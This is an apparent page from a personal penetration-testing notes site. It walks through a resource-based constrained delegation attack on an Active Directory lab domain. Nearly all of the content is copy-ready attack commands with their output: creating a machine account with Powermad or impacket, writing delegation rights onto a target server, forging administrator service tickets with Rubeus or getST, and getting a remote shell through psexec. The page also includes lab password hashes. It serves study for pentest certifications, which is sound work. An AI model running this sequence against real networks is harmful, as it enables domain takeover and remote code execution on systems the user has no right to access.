VulnableOne
  • 🧘‍♂️About Me
  • Offensive Treasure
    • 🧌Penetration Testing
      • Reconnaissance
        • Identify Ports/Hosts/Data
      • Enumeration
        • Service Ports
          • FTP (21)
          • SSH (22)
          • SMTP (25)
          • DNS (53)
          • TFTP (69/udp)
          • Finger (79)
          • SaMBa (139/445)
          • RPC/NFS (111/135)
          • SNMP (161/udp)
          • LDAP (389)
          • isakmp (500/udp)
          • Java (1099)
          • MS-SQL (1433)
          • MySQL (3306)
          • Distcc (3622)
          • PostgreSQL (5437)
          • Redis (6379)
      • Password Attack
        • Wordlist
        • Brute-Force
        • Crack Hash
      • File Transfer
        • Linux
        • Window
      • Misc
    • 🧙‍♂️AD Attack
      • Domain Enumeration
        • PowerView
        • AD-Module
        • Bloodhound
      • Abuse ACLs
        • GenericAll
        • GenericWrite
        • WriteDACL
        • ForceChangePassword
      • Kerberos Attack
        • Kerberoasting
        • ASREPRoasting
        • Unconstrained Delegation
        • Constrained Delegation
        • Resource Based Constrained Delegation
      • LAPs
      • MS SQL Servers
        • PowerUpSQL
        • SQL Server Management
        • Impacket-MSSQL
    • 🥷Red Team
      • Reconnaissance
        • Active Scanning
          • Scanning IP Blocks
          • Vulnerability Scanning
          • Wordlist Scanning
        • Gather Victim Host Information
          • Software
        • Gather Victim Identity Information
          • Credentials
          • Email Addresses
        • Search Open Websites/Domains
          • Social Media
          • Search Engines
          • Code Repositories
        • Search Victim-Owned Websites
      • Resource Development
        • C2 Infrastructure
        • Metasploit
      • Execution
        • Bash - Reverse Shell
        • HTA
        • JScript Dropper
        • Macro
        • Metasploit
        • Network Tools
        • Powershell
        • Python
        • VBA
        • Web Shell
        • WSH
      • Persistence
        • Logon Script
        • Startup Folder
        • WinLogon (Elevated)
        • Run / RunOnce (Elevated)
        • Scheduled Tasks (Elevated )
      • Privilege Escalation
        • Windows
          • SeBackup / SeRestore
          • SeTakeOwnership
          • SeImpersonate / SeAssignPrimaryToken
          • UAC Bypass
          • AutoInstall Elevate
          • Unquoted Service Paths
          • Weak Service Permissions
          • Weak Service Binary Permissions
        • Linux
          • Escalation
      • Defense Evasion
        • Bypassing AV
          • Pack Shellcode
        • Security Control
          • CLM
          • AppLocker
        • Use Alternate Authentication Material
          • Pass The Hash
          • Over Pass The Hash
          • Extract Tickets
          • Pass The Ticket
        • Impersonate
      • Credential Access
        • Adversary-in-the-Middle
          • LLMNR/NBT-NS/MDNS Poisoning
          • Evil SSDP
        • OS Credential Dumping
          • Protected LSASS
          • Invoke-Mimikatz
          • Mimikatz.exe
          • Secretsdump
          • Meterpreter Kiwi
          • Registry
          • Shadow Copy
          • DCSync
        • Steal or Forge Kerberos Tickets
          • Silver Ticket
          • Golden Ticket
        • Steal Web Session Cookie
      • Lateral Movement
        • Remote Access
        • Pivoting
          • Linux
          • Window
    • Web Application
      • Basic Recon
  • Blog
    • 📝Empty!!!
  • Course Review
    • 👨‍🎓Cyber Security Courses Journey
      • PNPT Journey
      • OSCP Journey
        • 🚩CTF
          • Hack The Box
            • Linux Boxes
              • ✅Admirer (Easy)
              • ✅Bashed (Easy)
              • ✅Beep (Easy)
              • ✅Blocky (Easy)
              • ✅FriendZone (Easy)
              • ✅Irked (Easy)
              • ✅Lame (Easy)
              • ✅Mirai (Easy)
              • ✅Networked (Easy)
              • ✅Nibbles (Easy)
              • ✅OpenAdmin (Easy)
              • ✅Sense (Easy)
              • ✅Shocker (Easy)
              • ✅Sunday (Easy)
              • ✅Tabby (Easy)
              • ✅Traverxec (Easy)
              • ✅Valentine (Easy)
              • ✅Cronos (Medium)
              • ✅Haircut (Medium)
              • ✅Jarvis (Medium)
              • ✅Magic (Medium)
              • ✅Nineveh (Medium)
              • ✅Node (Medium)
              • ✅Poison (Medium)
              • ✅SolidState (Medium)
              • ✅TartarSauce (Medium)
            • Window Boxes
              • ✅Arctic (Easy)
              • ✅Active (Easy)
              • ✅Blue (Easy)
              • ✅Bounty (Easy)
              • ✅Devel (Easy)
              • ✅Forest (Easy)
              • ✅Granny (Easy)
              • ✅Granpa (Easy)
              • ✅Jerry (Easy)
              • ✅Legacy (Easy)
              • ✅Optimum (Easy)
              • ✅Bastard (Medium)
              • ✅Silo (Medium)
          • Buffer Overflow
            • BOF - Tib3rius
            • BOF - TCM
              • 1- Spiking
              • 2- Fuzzing
              • 3- Finding Offset
              • 4- Overwriting EIP
              • 5- Finding Bad Characters
              • 6- Finding the Right Module
              • 7- Generating Shellcode
Powered by GitBook
On this page
  • Abuse by Windows System
  • Enumerating ms-DS-MachineAccountQuota
  • Creating computer account with Powermad
  • Creating a new SecurityDescriptor
  • Using S4U extension to request a TGS for appsrv
  • Abuse by Linux System
  • Adding Computer
  • Adding delegation permissions to AppSRV
  • Impersonating the Domain administrator
  • Remote Code Execution
  1. Offensive Treasure
  2. AD Attack
  3. Kerberos Attack

Resource Based Constrained Delegation

Abuse by Windows System

We can use this attack vector with GenericAll, WriteProperty, or WriteDACL access rights.

Enumerating ms-DS-MachineAccountQuota

PowerView
PS C:\> Get-DomainObject -Identity prod -Properties ms-DS-MachineAccountQuota

Creating computer account with Powermad

PS C:\Tools> . .\powermad.ps1

PS C:\Tools> New-MachineAccount -MachineAccount myComputer -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)
[+] Machine account myComputer added

We can verify our new computer is present

PS C:\> Get-DomainComputer -Identity myComputer

Creating a new SecurityDescriptor

PS C:\> $sid =Get-DomainComputer -Identity myComputer -Properties objectsid | Select -Expand objectsid

PS C:\> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($sid))" 

PS C:\tools> $SDbytes = New-Object byte[] ($SD.BinaryLength)

PS C:\tools> $SD.GetBinaryForm($SDbytes,0)

PS C:\tools> Get-DomainComputer -Identity appsrv | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

Verifying the SID in the SecurityDescriptor

PS C:\> $RBCDbytes = Get-DomainComputer appsrv -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity

PS C:\> $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RBCDbytes, 0

PS C:\> $Descriptor.DiscretionaryAcl

BinaryLength       : 36
AceQualifier       : AccessAllowed
IsCallback         : False
OpaqueLength       : 0
AccessMask         : 983551
SecurityIdentifier : S-1-5-21-434106389-3621871093-548134407-3601
AceType            : AccessAllowed
AceFlags           : None
IsInherited        : False
InheritanceFlags   : None
PropagationFlags   : None
AuditFlags         : None

PS C:\> ConvertFrom-SID S-1-5-21-434106389-3621871093-548134407-3601
Vulnableone\myComputer$

Using S4U extension to request a TGS for appsrv

PS C:\Tools> .\Rubeus.exe s4u /user:myComputer$ /rc4:A36EAFB522589934A6E5CE92C6434223 /impersonateuser:administrator /msdsspn:CIFS/appsrv.vulnableone.local /ptt

Now that we have a TGS for the CIFS service on appsrv as administrator.

PS C:\Tools> dir \\appsrv.vulnableone.local\c$                                                                                                                           

    Directory: \\appsrv.vulnableone.local\c$


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        3/20/2024   4:32 AM                inetpub
d-----        3/16/2014   6:23 AM                PerfLogs
d-r---        3/20/2024   4:27 AM                Program Files
d-----        3/16/2014   6:23 AM                Program Files (x86)
d-----        3/18/2024   5:16 AM                Tools
d-r---        3/20/2024   5:41 AM                Users
d-----        3/20/2024   4:32 AM                Windows

Abuse by Linux System

Adding Computer

└─$ impacket-addcomputer -computer-name 'myComputer$' -computer-pass 'Password123' vulnableone.local/khan.chanthou -hashes :142f15864b0dfdee9f742616ea1eb773
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Successfully added machine account myComputer$ with password Password123.

Adding delegation permissions to AppSRV

└─$ impacket-rbcd -action write -delegate-to "AppSRV$" -delegate-from "myComputer$" vulnableone.local/khan.chanthou -hashes :142f15864b0dfdee9f742616ea1eb773
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] myComputer$ can now impersonate users on AppSRV$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     myComputer$   (S-1-5-21-434106389-3621871093-548134407-20101)

Impersonating the Domain administrator

└─$ impacket-getST -spn cifs/appsrv.vulnableone.local -impersonate administrator 'vulnableone.local/myComputer$:Passworod123'
Impacket v0.11.0 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*]     Requesting S4U2self
[*]     Requesting S4U2Proxy
[*] Saving ticket in administrator.ccache
└─$ export KRB5CCNAME=administrator.ccache  

└─$ klist
Ticket cache: FILE:administrator.ccache
Default principal: administrator@vulnableone.local

Valid starting       Expires              Service principal
02/25/2024 20:44:29  02/26/2024 06:44:26  cifs/appsrv.vulnableone.local@vulnableone.local
        renew until 02/26/2024 20:44:26

Remote Code Execution

└─$ impacket-psexec administrator@appsrv.vulnableone.local -k -no-pass
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on appsrv.vulnableone.local.....
[*] Found writable share ADMIN$
[*] Uploading file QlwvUzZs.exe
[*] Opening SVCManager on appsrv.vulnableone.local.....
[*] Creating service plgE on appsrv.vulnableone.local.....
[*] Starting service plgE.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.1726]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> hostname
APPSRV
PreviousConstrained DelegationNextLAPs

Last updated 1 year ago

🧙‍♂️